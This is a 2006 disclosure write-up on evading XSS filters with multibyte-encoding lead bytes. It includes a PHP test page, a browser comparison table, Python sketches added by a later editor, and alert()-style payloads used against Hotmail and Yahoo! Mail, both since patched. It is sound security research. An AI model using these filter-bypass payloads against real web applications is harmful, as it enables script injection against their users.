Bypassing script filters with variable-width encodings
Author: Cheng Peng Su (applesoup_at_gmail.com)
Date: August 7, 2006
It is well known that a central problem in constructing XSS attacks is
how to obfuscate the malicious code so that it slips past filters. In
the following paragraphs I explain the concept of bypassing script
filters with variable-width encodings, and disclose how this concept
applied to the Hotmail and Yahoo! Mail web-based mail services.
Variable-width encoding Introduction
====================================
A variable-width encoding (a.k.a. variable-length encoding) is a type
of character encoding scheme in which codes of differing lengths are
used to encode a character set. The most common variable-width
encodings are multibyte encodings, which use varying numbers of bytes
to encode different characters. Multibyte encodings were first used
for Chinese, Japanese and Korean, whose character sets are well in
excess of 256 characters. The Unicode standard has two variable-width
encodings: UTF-8 and UTF-16. The most commonly used multibyte codes
are two-byte codes; the EUC-CN form of GB2312, EUC-JP and EUC-KR are
examples of such two-byte EUC codes. There are also some three-byte
and four-byte codes.
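As a quick illustration of "variable width", the following Python
sketch prints how many bytes one ASCII letter and one Chinese character
occupy in several of the encodings discussed in this text. Python and
the sample characters are my own choice for illustration; they are not
part of the original write-up.

```python
# Sample characters and helper name are illustrative assumptions.
SAMPLES = ["A", "中"]
ENCODINGS = ["utf-8", "gb2312", "big5", "shift_jis", "euc_jp"]


def encoded_lengths(text, encodings=ENCODINGS):
    """Map each encoding name to the number of bytes `text` occupies in it."""
    return {name: len(text.encode(name)) for name in encodings}


for ch in SAMPLES:
    print(repr(ch), encoded_lengths(ch))
```

The ASCII letter stays one byte everywhere, while the Chinese character
needs two or three bytes depending on the encoding. The first of those
bytes is the "lead byte" that the rest of this text is about.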
Example and Discussion
======================
The following PHP file is the example from which I will introduce my idea.
------------------------------example.php--------------------------------
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
</head>
<body>
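<?php
// NOTE: the loop body was damaged in this copy of the text. It is
// reconstructed from the generated line quoted below, so details such
// as the line-break markup are assumptions. The discussion below also
// implies that several spaces follow the last quote; only one
// survives in this copy.
for ($i = 0; $i < 256; $i++) {
    echo "Char $i is <font face=\"xyz" . chr($i) . "\">not </font>"
       . "<font face=\" onmouseover=alert($i) s=" . chr($i) . "\" >"
       . "available</font>\r\n<br>\r\n";
}
?>
</body>
</html>
-------------------------------------------------------------------------
For most values of i, Internet Explorer 6.0 (SP2) will display "Char
XXX is not available". For certain values, however, it displays "Char
XXX is available" instead (the table below lists them). Take i=0xC0
for example, and consider the following generated code: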
Char 192 is <font face="xyz[0xC0]">not </font><font face="
onmouseover=alert(192) s=[0xC0]" >available</font>
0xC0 is one of the 32 first bytes of 2-byte sequences (0xC0-0xDF) in
UTF-8. When IE parses the above code, it treats 0xC0 and the following
quote as one sequence, so the quote no longer closes the attribute.
The two FONT elements therefore become one, with
xyz[0xC0]">not </font><font face= as the value of the FACE parameter.
The second 0xC0 starts another 2-byte sequence, which becomes the
value of the unquoted S parameter, a made-up parameter that does not
exist in HTML (NOTEXIST for short). The onmouseover handler between
the two is thus parsed as a real attribute. Because the quote is
followed by a space character, each of 0xE0-0xEF, the first bytes of
3-byte sequences, together with the following quote and one space
character, is likewise taken as the value of the NOTEXIST parameter.
Similarly, each first byte of a 4-byte sequence (0xF0-0xF7), 5-byte
sequence (0xF8-0xFB) or 6-byte sequence (0xFC-0xFD), together with the
following quote and space characters, is considered one sequence.
(These ranges follow the original UTF-8 layout. RFC 3629 limits UTF-8
to four bytes and excludes 0xC0, 0xC1 and 0xF5-0xFF, but a lenient
decoder may still treat them as first bytes.)
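The effect described above can be modelled with a few lines of Python.
This is only a toy model under a stated assumption: the decoder trusts
the first byte of a sequence and consumes the implied number of bytes
without checking that they are valid trail bytes. The function names
are hypothetical, and this is not IE's actual decoder.

```python
from typing import List


def lead_length(byte: int) -> int:
    """Sequence length implied by a first byte, using the ranges in the text."""
    if 0xC0 <= byte <= 0xDF:
        return 2
    if 0xE0 <= byte <= 0xEF:
        return 3
    if 0xF0 <= byte <= 0xF7:
        return 4
    if 0xF8 <= byte <= 0xFB:
        return 5
    if 0xFC <= byte <= 0xFD:
        return 6
    return 1


def lenient_split(data: bytes) -> List[bytes]:
    """Group bytes into 'characters' WITHOUT validating the trail bytes."""
    units, pos = [], 0
    while pos < len(data):
        width = lead_length(data[pos])
        units.append(data[pos:pos + width])
        pos += width
    return units


markup = (b'<font face="xyz\xc0">not </font>'
          b'<font face=" onmouseover=alert(192) s=\xc0" >available</font>')

# Every multi-byte unit is a first byte plus whatever bytes followed it.
swallowed = [unit for unit in lenient_split(markup) if len(unit) > 1]
print(swallowed)
```

In this model both quotes that directly follow 0xC0 end up inside a
two-byte unit, so an HTML parser working on the decoded characters
never sees them as attribute delimiters.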
The table below shows how Internet Explorer 6.0 (SP2), Firefox 1.5.0.6
and Opera 9.0.1 parse the above code under different variable-width
encodings. Each cell lists the ranges of byte values for which
"available" is displayed, that is, for which the byte swallows the
quote that follows it.
+-----------+-----------+-----------+-----------+
|           | IE        | FF        | OP        |
+-----------+-----------+-----------+-----------+
| UTF-8     | 0xC0-0xFF | none      | none      |
+-----------+-----------+-----------+-----------+
| GB2312    | 0x81-0xFE | none      | 0x81-0xFE |
+-----------+-----------+-----------+-----------+
| GB18030   | none      | none      | 0x81-0xFE |
+-----------+-----------+-----------+-----------+
| BIG5      | 0x81-0xFE | none      | 0x81-0xFE |
+-----------+-----------+-----------+-----------+
| EUC-KR    | 0x81-0xFE | none      | 0x81-0xFE |
+-----------+-----------+-----------+-----------+
| EUC-JP    | 0x81-0x8D | 0x8F      | 0x8E      |
|           | 0x8F-0x9F |           | 0x8F      |
|           | 0xA1-0xFE |           | 0xA1-0xFE |
+-----------+-----------+-----------+-----------+
| SHIFT_JIS | 0x81-0x9F | 0x81-0x9F | 0x81-0x9F |
|           | 0xE0-0xFC | 0xE0-0xFC | 0xE0-0xFC |
+-----------+-----------+-----------+-----------+
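To repeat such a comparison for another charset or browser, one test
page per charset is needed. The sketch below is a Python port of the
idea behind example.php. The function name, the line-break markup and
the page skeleton are assumptions of mine; only the FONT-FONT line
itself is taken from the text above.

```python
def build_test_page(charset: str) -> bytes:
    """Return a test page as raw bytes, one FONT-FONT line per byte value."""
    head = (
        "<html>\n<head>\n"
        f'<meta http-equiv="Content-Type" content="text/html; charset={charset}">\n'
        "</head>\n<body>\n"
    ).encode("ascii")
    rows = []
    for i in range(256):
        raw = bytes([i])  # the byte under test, inserted as-is (not encoded)
        prefix = b'Char %d is <font face="xyz' % i
        middle = b'">not </font><font face=" onmouseover=alert(%d) s=' % i
        suffix = b'" >available</font>\n<br>\n'
        rows.append(prefix + raw + middle + raw + suffix)
    return head + b"".join(rows) + b"</body>\n</html>\n"


if __name__ == "__main__":
    page = build_test_page("SHIFT_JIS")
    # Show the line generated for byte 0x81 as an example.
    print(page.split(b"\n<br>\n")[0x81])
```

The page must be written to disk in binary mode so that the raw bytes
survive unchanged. Opening it in a browser and noting which lines read
"available" yields one row of a table like the one above.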
Application
===========
I don't think there is one typical way of bypassing script filters
with variable-width encodings, because the exploitation is very
flexible. Just remember that if a webapp uses a variable-width
encoding, you can end your entry with a first byte that buries the
characters following your entry, and the buried characters might be
crucial ones, such as a closing quote.
The above code might be exploited in general webapps which allow you
to add formatting to your entry in the same way as HTML does. For
example, in some forums, [font=Courier New]message[/font] in your
message will be transformed into <font face="Courier
New">message</font>.
Supposing the forum uses UTF-8, we can attack by sending
[font=xyz[0xC0]]buried[/font][font=abc onmouseover=alert()
s=[0xC0]]exploited[/font]
And it will be transformed into
<font face="xyz[0xC0]">buried</font><font face="abc
onmouseover=alert() s=[0xC0]">exploited</font>
Again, the exploitation is very flexible; this FONT-FONT example is
just an illustrative one. The exploitation of Yahoo! Mail described
below is quite different from this one.
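The forum scenario can be sketched in Python as follows. Both
functions are hypothetical models: the first stands in for a forum
that converts [font=...] tags byte by byte and refuses quotes and
angle brackets in the font name, the second for a decoder that pairs
every byte in 0xC0-0xDF with whatever byte follows it (each pair is
shown as "?"). Neither is the code of any real forum or browser.

```python
import re

# Font names may not contain quotes, angle brackets or square brackets.
FONT_TAG = re.compile(rb'\[font=([^\]\["<>]*)\](.*?)\[/font\]', re.S)


def bbcode_font_to_html(post: bytes) -> bytes:
    """Naive forum conversion that works on raw bytes."""
    return FONT_TAG.sub(rb'<font face="\1">\2</font>', post)


def lenient_two_byte_view(data: bytes) -> bytes:
    """Show each 0xC0-0xDF byte plus its successor as a single '?'."""
    return re.sub(rb"[\xc0-\xdf].", b"?", data, flags=re.S)


post = (b"[font=xyz\xc0]buried[/font]"
        b"[font=abc onmouseover=alert() s=\xc0]exploited[/font]")

html = bbcode_font_to_html(post)
view = lenient_two_byte_view(html)

# Parse the first tag the way an HTML parser would see the decoded text.
tag = re.match(rb'<font face="([^"]*)"([^>]*)>', view)
print(tag.group(1))  # value of FACE as seen after lenient decoding
print(tag.group(2))  # what is left over as further attributes
```

The converter never emits an unescaped quote from user input, yet
after lenient decoding the FACE value runs into the second tag and
onmouseover=alert() is left over as an attribute of its own.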
Disclosure
==========
Using this method, I found two XSS vulnerabilities, one in each of the
Hotmail and Yahoo! Mail web-based mail services. I informed Yahoo and
Microsoft on April 30 and May 12 respectively, and both have patched
the vulnerabilities.
Yahoo! Mail XSS
---------------
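Before I discovered this vulnerability, the Yahoo! Mail filtering
engine could already block the "expression()" syntax in a CSS
attribute, even when a comment was used to break up the word
( expr/* */ession() ). I put [0x81] directly before an asterisk so
that, under GB2312, the browser reads the two bytes as one sequence.
For the browser the first */ therefore does not exist, and the second
*/ closes the comment, which leaves expression(alert()). The filtering
engine, however, considered the first two comment symbols /* and */ a
pair, so it saw expr*/ession(alert()), which does not match
"expression()".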
--------------------------------------------------------------------
MIME-Version: 1.0
From: user<user@site.com>
Content-Type: text/html; charset=GB2312
Subject: example
<span style='width:expr/*[0x81]*/*/ession(alert())'>exploited</span>
.
--------------------------------------------------------------------
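The two readings of the Yahoo! Mail payload can be compared with a
small Python model. Both functions are assumptions made for
illustration: the first removes CSS comments byte by byte, as the
filtering engine apparently did, and the second first fuses every byte
in 0x81-0xFE (the IE range for GB2312 in the table above) with the
byte that follows it, then removes comments.

```python
import re

PAYLOAD = b"width:expr/*\x81*/*/ession(alert())"


def strip_comments_bytewise(css: bytes) -> bytes:
    """Assumed filter view: every byte is a character of its own."""
    return re.sub(rb"/\*.*?\*/", b"", css, flags=re.S)


def strip_comments_double_byte(css: bytes) -> bytes:
    """Assumed browser view: a 0x81-0xFE byte fuses with the next byte."""
    tokens, pos = [], 0
    while pos < len(css):
        fused = 0x81 <= css[pos] <= 0xFE and pos + 1 < len(css)
        width = 2 if fused else 1
        tokens.append(css[pos:pos + width])
        pos += width

    out, in_comment, i = [], False, 0
    while i < len(tokens):
        pair = tokens[i:i + 2]
        if not in_comment and pair == [b"/", b"*"]:
            in_comment = True   # comment opens
            i += 2
        elif in_comment and pair == [b"*", b"/"]:
            in_comment = False  # comment closes
            i += 2
        else:
            if not in_comment:
                out.append(tokens[i])
            i += 1
    return b"".join(out)


print(strip_comments_bytewise(PAYLOAD))
print(strip_comments_double_byte(PAYLOAD))
```

Only the second reading contains the word "expression", which is why a
filter that scans single bytes lets the payload through.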
Hotmail XSS
-----------
This exploit is almost the same as the one in example.php.
--------------------------------------------------------------------
MIME-Version: 1.0
From: user<user@site.com>
Content-Type: text/html; charset=SHIFT_JIS
Subject: example
<font face="[0x81]"></font><font face=" onmouseover=alert()
s=[0x81]">exploited</font>
.
--------------------------------------------------------------------
Reference
=========
Wikipedia: Variable-width encoding (http://en.wikipedia.org/wiki/Variable-width_encoding)
RFC 3629, the UTF-8 standard (http://tools.ietf.org/html/rfc3629)
RSnake: XSS Cheat Sheet (http://ha.ckers.org/xss.html)
( Original text: http://applesoup.googlepages.com/bypass_filter.txt )